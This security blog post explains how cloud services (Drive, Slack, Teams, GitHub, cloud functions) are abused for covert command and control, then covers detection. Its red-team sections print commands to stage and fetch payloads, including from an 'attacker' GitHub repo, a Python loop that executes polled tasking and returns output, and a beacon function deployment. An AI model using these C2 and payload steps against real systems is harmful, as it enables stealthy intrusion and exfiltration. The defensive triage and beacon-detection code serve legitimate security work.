# Living Off the Cloud: Abusing Cloud Services for Red Teaming

<figure><img src="https://cdn-images-1.medium.com/max/800/1*FckEUogcHe6AEPP_zFSp6A.jpeg" alt=""><figcaption></figcaption></figure>

***

#### Introduction: Blending into the Digital Skyline <a href="#f71f" id="f71f"></a>

Cyber threats today no longer depend on flashy malware or sketchy infrastructure. Modern adversaries, especially Advanced Persistent Threats (APTs), increasingly route command and control, payload delivery and exfiltration through **trusted cloud services** so that their traffic is indistinguishable from everyday business use. The technique is called **Living Off The Cloud (LOTC)**, and it is rapidly becoming a staple of red team and nation-state toolkits.

Just as **Living Off the Land (LOTL)** abuses native OS tools, **LOTC abuses cloud infrastructure your organisation already trusts and allows.**

#### Why it Works <a href="#b207" id="b207"></a>

**Cloud services are:**

* Widely used and trusted: firewalls and proxies almost always allow their traffic.
* Encrypted by default: nearly all of them speak HTTPS, so payloads are opaque unless you do TLS inspection.
* Hard to block: you can’t simply deny Google or Microsoft domains in most organisations without breaking the business.
* Globally available: attackers don’t need to build infrastructure, just register an account (or steal one).

## Red Teaming Use Cases <a href="#id-16d0" id="id-16d0"></a>

### **Command and Control via Google Drive or Dropbox**

#### **TTP Flow:**

* The attacker drops payloads and tasking files into a shared cloud folder.
* The infected host polls the folder at a fixed interval (e.g., every 30 s) via a scheduled task or beacon and executes whatever it finds.
* Exfiltrated data (e.g., screenshots, keystrokes) is uploaded to the same folder as new files.

#### **Tools:**

* `Sliver` (C2 framework) paired with a custom Google Drive API transport
* `gdrive`: CLI for file uploads/downloads

```
# prasmussen/gdrive (v2) syntax; the newer glotlabs gdrive uses
# "gdrive files upload" / "gdrive files download" instead.
gdrive upload C2_payload.exe                                  # operator: stage the payload in Drive
gdrive download query --path /tmp "name = 'tasking.json'"     # implant: fetch tasking by file name
```

**Why it works:** Google Drive traffic blends in with normal productivity behavior.

### **Slack or Microsoft Teams as C2 Channels**

#### **TTP Flow:**

* A Slack bot (or Teams app) posts commands in a private channel.
* Compromised endpoints poll the channel with the bot token and execute what they read.
* Output is posted back as messages (or file uploads for larger results).
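The poll/execute/post-back loop behind both the Drive/Dropbox flow and the Slack/Teams flow above, as an added example that is not part of the original post or of any tool it names. A local temporary directory stands in for the synced cloud folder (or the chat channel); the file names, the JSON task format and the function names are assumptions made for this example. A real implant would swap the two file operations for Drive API / `gdrive` calls, or for Slack `chat.postMessage` and `conversations.history`.

```python
"""Added example (not from the original post): the poll/execute/post-back
loop behind the Drive/Dropbox and Slack/Teams C2 flows, with a local temp
directory standing in for the synced cloud folder (or the chat channel).
File names, the JSON task format and function names are assumptions."""
import json
import subprocess
import sys
import tempfile
from pathlib import Path

TASK_PREFIX = "task-"      # operator -> implant
RESULT_PREFIX = "result-"  # implant -> operator


def operator_queue_task(folder: Path, task_id: str, cmd: list) -> Path:
    """Operator side: drop one tasking file into the shared folder."""
    path = folder / f"{TASK_PREFIX}{task_id}.json"
    path.write_text(json.dumps({"id": task_id, "cmd": cmd}))
    return path


def implant_poll_once(folder: Path, seen: set) -> list:
    """Implant side: one poll; return tasks not executed before, oldest first.
    The 'seen' set is what stops a task being re-run on every 30 s poll."""
    fresh = []
    for p in sorted(folder.glob(f"{TASK_PREFIX}*.json")):
        task = json.loads(p.read_text())
        if task["id"] not in seen:
            seen.add(task["id"])
            fresh.append(task)
    return fresh


def implant_execute(task: dict) -> dict:
    """Run the tasked command and package its output for upload."""
    proc = subprocess.run(task["cmd"], capture_output=True, text=True, timeout=30)
    return {"id": task["id"], "rc": proc.returncode,
            "stdout": proc.stdout, "stderr": proc.stderr}


def implant_post_result(folder: Path, result: dict) -> Path:
    """Output goes back as a new file (the 'gdrive upload' step)."""
    path = folder / f"{RESULT_PREFIX}{result['id']}.json"
    path.write_text(json.dumps(result))
    return path


def operator_collect(folder: Path) -> dict:
    """Operator side: read every result file, keyed by task id."""
    results = {}
    for p in folder.glob(f"{RESULT_PREFIX}*.json"):
        r = json.loads(p.read_text())
        results[r["id"]] = r
    return results


def demo_round_trip(cmd: list = None) -> dict:
    """Queue one task, let the implant poll twice, and return what the
    operator sees plus how many tasks the second poll picked up
    (0, because the 'seen' set deduplicates)."""
    if cmd is None:  # portable default: run the interpreter itself
        cmd = [sys.executable, "-c", "print('hello from implant')"]
    with tempfile.TemporaryDirectory() as d:
        folder = Path(d)
        seen = set()
        operator_queue_task(folder, "0001", cmd)
        for task in implant_poll_once(folder, seen):
            implant_post_result(folder, implant_execute(task))
        second_poll = len(implant_poll_once(folder, seen))
        return {"result": operator_collect(folder)["0001"],
                "second_poll": second_poll}


if __name__ == "__main__":
    print(demo_round_trip())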

**Abuse Example:**

Slack incoming webhook: [`https://hooks.slack.com/services/XXXX/YYYY/ZZZZ`](https://hooks.slack.com/services/XXXX/YYYY/ZZZZ)

Note that an incoming webhook is post-only: it works for heartbeats and exfiltration but cannot read a channel, so tasking requires a bot token with channel-read permissions.

**GitHub PoC:**

* `slack-shell`
* `TeamC2`: C2 over Microsoft Teams messages

**Reference:**

In 2023 Microsoft reported that Midnight Blizzard (APT29) used previously compromised Microsoft 365 tenants to send Teams chat messages that socially engineered targets into approving MFA prompts, a credential-theft campaign delivered entirely over a trusted collaboration platform.

> **Bonus:** Many orgs run Slack in-browser or as a native app; either way the traffic is trusted and rarely inspected.

### **Payload Hosting via GitHub Repositories**

GitHub repositories (public or private) can host:

* Encrypted payloads or scripts
* Infrastructure-as-code (IaC) templates for spinning up dynamic attack infrastructure
* Configuration files used by implants

Everything is delivered over HTTPS from GitHub’s own CDN, so nothing about the transport looks unusual.

Tool Example:

* `gitC2`: C2 over GitHub repos.

```
# fetch the staged, encrypted payload over plain git/HTTPS
git clone https://github.com/attacker/payloads.git
cd payloads

# decrypt it locally; the key never touches the repository
gpg --output payload.bin --decrypt payload.bin.gpg
```

### **Persistence via Cloud Functions**

Cloud functions provide **event-driven execution** in the cloud, and a function quietly deployed into a compromised account survives host reimaging, which makes it a stealthy persistence point.

**Platforms:**

* **AWS Lambda**
* **Google Cloud Functions**
* **Azure Functions**

Red Team Use:

* Serve C2 tasking from a function triggered by HTTP request
* Keep state in warm function containers between invocations
* Auto-deploy second-stage payloads

```
# deploys main.py from the current directory with entry point "beacon";
# python39 is a deprecated runtime, use a current one (e.g. python312)
gcloud functions deploy beacon --runtime python39 --trigger-http
```

## Blue Teams: Defending Against LOTC <a href="#f0fd" id="f0fd"></a>

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

### **Monitor for Anomalous Cloud Service Use**

* **OAuth token abuse:** unknown third-party apps granted high-privilege scopes (mailbox, Drive, offline access)
* **Personal cloud storage:** consumer Drive/Dropbox accounts used from corporate devices
* **API usage spikes:** especially to Slack, GitHub and Dropbox from hosts that have no business reason to call them
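A triage routine for the OAuth-consent bullet above, as an added example that is not part of the original post. The event fields and the sample events are constructed for this example and simplified relative to the real Google Workspace (token "authorize") and Entra ID ("Consent to application") audit schemas; map your tenant’s real fields onto the same names before use. The approved client-ID list is an assumption standing in for your sanctioned apps.

```python
"""Added example (not from the original post): triage OAuth consent events
for third-party apps that obtained high-risk scopes. The event shape and the
sample events are constructed and simplified; APPROVED_CLIENT_IDS is an
assumed allowlist of sanctioned apps."""
from collections import defaultdict

HIGH_RISK_SCOPES = {
    # Google Workspace
    "https://www.googleapis.com/auth/drive",
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/gmail.readonly",
    # Microsoft Graph
    "Mail.Read", "Mail.ReadWrite", "Files.ReadWrite.All", "offline_access",
}
# Assumption: client ids your org has reviewed and sanctioned.
APPROVED_CLIENT_IDS = {"corp-backup-connector"}

# Constructed events: one sanctioned app, one low-risk app, and an unknown
# "PDF viewer" that two users consented to with mailbox + Drive access.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:12:00Z", "user": "alice@corp.example",
     "client_id": "corp-backup-connector", "app_name": "Corp Backup",
     "scopes": ["https://www.googleapis.com/auth/drive"]},
    {"ts": "2024-05-01T09:40:00Z", "user": "bob@corp.example",
     "client_id": "calendar-widget-77", "app_name": "Meeting Widget",
     "scopes": ["https://www.googleapis.com/auth/calendar.readonly"]},
    {"ts": "2024-05-01T10:02:00Z", "user": "bob@corp.example",
     "client_id": "pdfview-4c1", "app_name": "PDF Viewer Pro",
     "scopes": ["https://www.googleapis.com/auth/drive",
                "https://mail.google.com/"]},
    {"ts": "2024-05-01T10:05:00Z", "user": "carol@corp.example",
     "client_id": "pdfview-4c1", "app_name": "PDF Viewer Pro",
     "scopes": ["https://www.googleapis.com/auth/drive",
                "https://mail.google.com/"]},
]


def triage_consents(events, approved=APPROVED_CLIENT_IDS):
    """One finding per unapproved client_id holding high-risk scopes.
    Findings are sorted by how many distinct users consented, because an
    unknown app spreading across users is the signature of a consent
    phishing campaign rather than one person's bad judgement."""
    by_app = defaultdict(lambda: {"users": set(), "scopes": set(),
                                  "first_seen": None, "app_name": None})
    for ev in events:
        risky = set(ev["scopes"]) & HIGH_RISK_SCOPES
        if not risky or ev["client_id"] in approved:
            continue
        rec = by_app[ev["client_id"]]
        rec["users"].add(ev["user"])
        rec["scopes"] |= risky
        rec["app_name"] = ev["app_name"]
        # ISO-8601 UTC strings compare correctly as plain strings
        rec["first_seen"] = (ev["ts"] if rec["first_seen"] is None
                             else min(rec["first_seen"], ev["ts"]))
    findings = [{
        "client_id": cid,
        "app_name": rec["app_name"],
        "risky_scopes": sorted(rec["scopes"]),
        "user_count": len(rec["users"]),
        "first_seen": rec["first_seen"],
    } for cid, rec in by_app.items()]
    findings.sort(key=lambda f: (-f["user_count"], f["client_id"]))
    return findings


if __name__ == "__main__":
    for f in triage_consents(SAMPLE_EVENTS):
        print(f)
```

The response to a hit is to revoke the grant at the identity provider, not to reset the user’s password: an OAuth refresh token survives a password change, which is exactly why attackers favour it over stolen credentials.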

### **Inspect DNS and HTTPS Metadata**

Even if payloads are encrypted, the following patterns are visible in proxy and DNS logs:

* Repeated traffic to non-standard subdomains of a cloud provider
* Regular timing patterns (e.g., beaconing every 30 s with little jitter) that humans never produce
* Known cloud URLs used in unusual ways (a build server talking to Slack, a kiosk uploading to Dropbox)
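A detector for the timing bullet above, as an added example that is not part of the original post. It groups proxy log lines by (source, destination host), computes the inter-request intervals, and flags pairs whose intervals are almost constant. The log format and the log lines are constructed for this example; `parse_line()` is the only part that changes for a real proxy schema.

```python
"""Added example (not from the original post): flag fixed-interval beaconing
to a cloud service in proxy logs. The line format and SAMPLE_LOG are
constructed for this example; adapt parse_line() to your proxy's schema."""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

# Constructed lines: "<iso8601> <src_ip> <dest_host> <bytes>".
# 10.0.0.5 hits api.dropboxapi.com every ~30 s (an implant polling for
# tasking); 10.0.0.9 uses Google Drive at human, irregular times.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:00:05Z 10.0.0.9 drive.google.com 120455
2024-05-01T10:00:09Z 10.0.0.9 drive.google.com 9931
2024-05-01T10:00:30Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:01:01Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:01:30Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:02:00Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:02:31Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:03:00Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:03:30Z 10.0.0.5 api.dropboxapi.com 812
2024-05-01T10:03:40Z 10.0.0.9 drive.google.com 4411
2024-05-01T10:11:02Z 10.0.0.9 drive.google.com 880213
2024-05-01T10:11:03Z 10.0.0.9 drive.google.com 2210
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, host, bytes)."""
    ts, src, host, nbytes = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, src, host, int(nbytes)


def detect_beacons(log_text, min_requests=6, max_cv=0.2):
    """Return (src, host) pairs whose inter-request intervals are regular.
    cv = stdev / mean of the intervals: a machine beacon sits near 0,
    human browsing is bursty and scores far higher."""
    times = defaultdict(list)
    for line in log_text.strip().splitlines():
        when, src, host, _ = parse_line(line)
        times[(src, host)].append(when)
    findings = []
    for (src, host), stamps in times.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(deltas)
        cv = pstdev(deltas) / period if period else float("inf")
        if cv <= max_cv:
            findings.append({"src": src, "host": host, "requests": len(stamps),
                             "period_s": round(period, 1),
                             "jitter_cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for finding in detect_beacons(SAMPLE_LOG):
        print(finding)
```

Most C2 frameworks add configurable jitter to defeat exactly this check, so in practice you widen `max_cv`, look at the distribution of intervals over hours rather than minutes, and combine timing with the constant request size (the `812` byte column above) and the destination host’s novelty for that source.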

### **Log Everything You Can**

* Enable audit logs on cloud platforms (e.g., Google Workspace, M365) and ship them to your SIEM.
* Monitor file-sharing activity and access patterns, especially shares to external accounts.
* Look for out-of-place automation: rogue bots, Lambda or Cloud Functions nobody deployed, unexpected GitHub webhooks.

### **Behavioural Signals Summarised**

Even when payloads are encrypted, behaviour reveals intent; the figure below summarises the DNS and HTTPS metadata signals to hunt for:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*gYYC-2UwLieer9TF3HXUhA.png" alt=""><figcaption></figcaption></figure>

## CVEs, Zero-Days and Weaknesses Enabling LOTC <a href="#id-756c" id="id-756c"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*rYUkuu8g_apgPuaOGftn-Q.png" alt=""><figcaption></figcaption></figure>

## Future of LOTC: AI-Enhanced Attacks? <a href="#d397" id="d397"></a>

With the rise of **GenAI and cloud** together, imagine:

* LLM-generated, per-target phishing sent from compromised Microsoft 365 tenants
* Dynamic payload generation and hosting on GitHub Actions
* AI-controlled implants that tunnel tasking through LLM provider APIs (e.g., OpenAI, Anthropic), which are trusted and encrypted like any other cloud API

## Try it Yourself <a href="#id-26ef" id="id-26ef"></a>

To build a simulated red team scenario using cloud-based C2, check out:

* **Mythic C2 Framework:**

{% embed url="<https://github.com/its-a-feature/Mythic>" %}

* **Sliver C2:**

{% embed url="<https://github.com/BishopFox/sliver>" %}

* **Red Canary’s Atomic Red Team Cloud TTPs:**

{% embed url="<https://github.com/redcanaryco/atomic-red-team>" %}
